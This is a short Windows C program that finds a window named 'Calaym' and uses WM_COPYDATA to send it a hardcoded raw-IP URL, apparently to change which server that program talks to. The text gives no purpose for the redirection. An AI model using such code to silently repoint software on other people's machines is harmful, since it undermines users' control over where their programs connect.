#include <windows.h>
#include <stdio.h>

int main()
{
  HANDLE hWndCalaym;
  COPYDATASTRUCT xCDS;
  LPCWSTR xURL;

  hWndCalaym = FindWindow("CalaymInterMsgClass101", "Calaym");
  if (hWndCalaym)
  {
    xURL = L"http://162.213.197.54:80";
    wprintf(xURL);
    xCDS.dwData = 3; // URL
    xCDS.cbData = lstrlenW(xURL) << 1;
    xCDS.lpData = xURL;
    SendMessageW(hWndCalaym, WM_COPYDATA, 0, (LPARAM)&xCDS);
  }
  return 0;
}
